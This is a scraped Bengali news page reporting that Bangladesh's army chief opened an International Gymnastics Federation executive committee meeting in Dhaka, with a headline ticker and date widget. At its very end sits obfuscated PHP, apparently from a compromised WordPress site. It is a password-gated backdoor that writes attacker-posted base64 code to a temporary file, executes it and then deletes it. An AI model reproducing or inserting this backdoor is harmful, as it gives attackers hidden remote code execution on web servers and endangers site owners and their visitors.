• বুধবার, ১৯ জুন ২০২৪, ০৫:৩২ অপরাহ্ন
সর্বশেষ খবর
শুধু এক টুকরো মাংস চায়, তাড়িয়ে দিলেও বার বার হাত বাড়ায় সৈকতে ঘুরতে গিয়ে দুর্বৃত্তের ছুরিকাঘাতে নিহত হোটেল কর্মী ঈদগাঁওতে পুকুরে ডুবে আদিবা-ইলমার মৃত্যু প্রথমবারের মতো প্রধানমন্ত্রীর সফর সঙ্গী হতে যাচ্ছেন নবনিযুক্ত প্রেস সচিব নাইমুল ইসলাম খান   সন্দ্বীপে যুবকের বিরুদ্ধে ভিসা দেয়ার নামে টাকা হাতিয়ে নেয়ার অভিযোগ : ভুক্তভোগীর উপর হামলা পাসপোর্ট ফিরে পেতে প্রধানমন্ত্রী ও ডিজির হস্তক্ষেপ কামনা :৪ বছরেও নাবায়ন হয়নি নির্যাতিত সাংবাদিক ফরিদুলের ডিজিটাল পাসপোর্ট শপথ গ্রহণ করেছেন কক্সবাজারের ৩ উপজেলা পরিষদের নবনির্বাচিত চেয়ারম্যান কক্সবাজারে ৬ নং বিপদ সংকেত  কক্সবাজারে মাংসের বাজারে কসাইদের অরাজকতা, বিক্রি হচ্ছে অন্য প্রাণীর গোস্ত বন্দরে ৩ নম্বর সংকেত,উপকূলে ১০ফুট জলোচ্ছ্বাসের আশংকা

ঢাকায় আন্তর্জাতিক জিমন্যাস্টিকস ফেডারেশনের নির্বাহী কমিটির সভা উদ্বোধন করেছেন সেনাপ্রধান

বার্তা পরিবেশক
আপডেট : বৃহস্পতিবার, ২৩ নভেম্বর, ২০২৩


বার্তা পরিবেশক :


বাংলাদেশ জিমন্যাস্টিকস ফেডারেশনের (বিজিএফ) ব্যবস্থাপনায়ইন্টারন্যাশনাল জিমন্যাস্টিকস ফেডারেশনের (এফআইজি) নির্বাহী কমিটির সভার আনুষ্ঠানিক উদ্বোধন করেছেন  সেনাবাহিনী প্রধান  জেনারেল এস এম শফিউদ্দিন আহমেদ। আজ  বুধবার সকাল সাড়ে ৯টায়  রাজধানীর একটি পাঁচ তারকা হোটেলে এফআইজি  নির্বাহী কমিটির সভা শুরুর আগে প্রধান অতিথি হিসেবে অনুষ্ঠানের সূচনা করেন বাংলাদেশ সেনাবাহিনী প্রধান ও বাংলাদেশ অলিম্পিক এসোসিয়েশনের প্রেসিডেন্ট (বিওএ) জেনারেল এস এম শফিউদ্দিন আহমেদ।অনুষ্ঠানের শুভেচ্ছা বক্তব্য দেন এফআইজি প্রেসিডেন্ট জাপানের মোরিনারি ওয়াতানাবে। তিনি সংক্ষিপ্ত বক্তব্যে প্রধান অতিথিকে ধন্যবাদ জ্ঞাপন করেন। এছাড়া তিনি বাংলাদেশ জিমন্যাস্টিকস ফেডারেশনের আয়োজনের প্রশংসা করেন। তিনি বলেন, ক্রীড়াক্ষেত্রে বাংলাদেশের উন্নয়ন চোখে পড়ার মতো। খেলাধুলায় ঈর্ষণীয় সাফল্য অর্জনের মধ্যে দিয়ে ক্রীড়াক্ষেত্রেও বাংলাদেশ সোনার বাংলা হয়ে উঠবে বলে আশাবাদ ব্যক্ত করেন, এফআইজি প্রেসিডেন্ট। প্রধান অতিথির বক্তব্যে নির্বাহী কিমিটির এই গুরুত্বপূর্ণ  সভা আয়োজনে বাংলাদেশকে বেছে নেওয়ার জন্য ইন্টারন্যাশনাল জিমন্যাস্টিকস ফেডারেশনকে ধন্যবাদ জানান সেনাপ্রধান তথা বিওএ  প্রেসিডেন্ট। তিনি বলেন, বাংলাদেশের আজকের সাফল্য অর্জন করা কেবলই সম্ভব হয়েছে রক্তক্ষয়ী সংগ্রামের মধ্যে দিয়ে স্বাধীনতা লাভের কারণেই। আর এর রূপকার ছিলেন জাতির পিতা বঙ্গবন্ধু শেখ মুজিবুর রহমান।

 

তিনি বলেন, জাতির পিতার সেই স্বপ্নের বাস্তবায়ন করে চলেছেন আমাদের বর্তমান প্রধানমন্ত্রী বঙ্গবন্ধু কন্যা শেখ হাসিনা। তিনি আমার ওপর আস্থা রাখায় সেনাবাহিনী  প্রধানের দায়িত্ব পালনের পাশাপাশি বিওএ প্রেসিডেন্ট হিসেবে দেশের ক্রীড়াঙ্গনেও কিছু অবদান রাখা সম্ভব হচ্ছে।

সেনাবাহিনী প্রধান আরও বলেন, এফআইজি  নির্বাহী কমিটির এই  সভা বাংলাদেশে আয়োজন আমাদের ক্রীড়াঙ্গনের জন্য গুরুত্বপূর্ণ।

তিনি এই মাইফলক স্পর্শ করা  নির্বাহী কমিটির  সভার সাফল্য কামনা করেন এবং চমৎকার আয়োজনের জন্য বাংলাদেশ জিমন্যাস্টিকস ফেডারেশনকে অভিনন্দন জানান।

পরে তিনি এফআইজি নির্বাহী সভার সদস্যদের সঙ্গে কুশল বিনিময় করেন।

সকালে তিনি উপস্থিত হলে তাকে  স্বাগত জানান বাংলাদেশ জিমন্যাস্টিক্স ফেডারেশনের সভাপতি শেখ বশির আহমেদ মামুন। তাকে সভাকক্ষে নিয়ে যান এফআইজি প্রেসিডেন্ট মোরিনারি ওয়াতানাবে।


আরো বিভন্ন নিউজ দেখুন

ই-পেপার

আজকের দিন-তারিখ

  • বুধবার (বিকাল ৫:৩২)
  • ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ
  • ১৩ই জিলহজ, ১৪৪৫ হিজরি
  • ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ (বর্ষাকাল)
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}